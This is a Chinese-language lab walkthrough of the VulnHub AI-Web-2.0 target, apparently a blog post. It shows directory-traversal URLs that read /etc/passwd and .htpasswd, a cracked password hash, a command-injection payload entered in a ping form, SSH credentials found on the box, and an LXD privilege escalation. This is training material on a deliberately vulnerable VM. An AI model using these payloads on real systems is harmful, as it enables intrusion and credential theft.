vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
这是一个Web的漏洞靶机,老样子需要找到flag即可。
官网地址:https://download.vulnhub.com/aiweb/AI-Web-2.0.7z
kali里使用netdiscover
发现主机
使用命令:nmap -sS -sV -A -n 192.168.0.105
发现开启了22
端口和80
端口 先访问一下80
端口 注册一个账号登入一下,然后扫一下后台 dirb
FileSharing
文件共享?? 使用命令searchsploit
搜索一下相关漏洞 然后看一下漏洞怎么利用(目录穿越漏洞)
http://192.168.0.105/download.php?file_name=../../../../../../../../../../../../../etc/passwd ##利用漏洞看passwd
在/etc/passwd/
下面发现了 两个用户 分别是 aiweb2
n0nr00tuser
可能等下需要用到先放着 接着读取一下apache
文件
192.168.0.105/download.php?file_name=../../../../../../../../../../../../../etc/apache2/sites-enabled/000-default.conf
http://192.168.0.105/download.php?file_name=../../../../../../../../../../../../../etc/apache2/.htpasswd
新建一个pass.txt
把加密的复制进去aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/
使用工具john
破解 发现 破解失败
后面才发现 给的提示有字典的名称:rockyou-45.txt
去github
上面找一个下载一下即可(这里没有外网 本机下载拖到kali)
字典链接:https://github.com/danielmiessler/SecLists/blame/master/Passwords/Leaked-Databases/rockyou-45.txt
得到账号密码:aiweb2admin/c.ronaldo
先登入一下后台,发现它给的提示的网络爬虫协议 访问一下http://192.168.0.105/webadmin/robots.txt
发现了两个路径分别是 /H05Tpin9555
/ 和 /S0mextras/
依次进行访问
这里访问第一个路径 /H05Tpin9555
存在一个ping的对话框 怀疑是命令 执行漏洞 第二个路径/S0mextras/
下没有发现什么新东西。
使用命令:127.0.0.1|find ../S0mextras/ . -type f 2>/dev/null
发现了个隐藏文件 可能是ssh
账号的密码文档 进行访问查看。
账号:n0nr00tuser
密码:zxowieoi4sdsadpEClDws1sf
使用ssh
登入 发现登入成功!!!
登入成功先看一下权限 使用命令:id
,uname -a
cat /etc/os-release
发现权限很低,先sudo -l
看一下 还是没有权限
使用命令:find / -perm -u=s -type f 2>/dev/null
查看二进制文件
使用命令searchsploit linux 18.04
搜一下相关版本看看系统有啥漏洞可以利用
查看利用.sh
文件 第一步需要下载build-alpine
,第二步运行里面的build alpine
然后给靶机运行就可以得到root
https://github.com/saghul/lxd-alpine-builder/
现在好了拖到kali
里面 然后解压 运行./build-alpine
会下载一个apk
的文件
然后ls
一下会发现多了一个命名规则是年份日期的,然后把这个传到靶机中。
使用命令:find / –name flag*
至此获取到了flag,渗透测试结束。
①:了解了目录穿越漏洞(FileSharing)
②:命令执行漏洞需要 要多进行隐藏文件的收集(可以使用.
)
③:信息收集后要学会 搜索相关漏洞并进行利用(Ubuntu 18.04)
④:注意权限的问题 很多时候没有权限是执行不了的 会提权失败(chmod 777)
这次是一个Web靶机的学习,希望大家也可以学习到新的一些知识点和一些渗透测试思路 最后祝大家五一假期快乐!!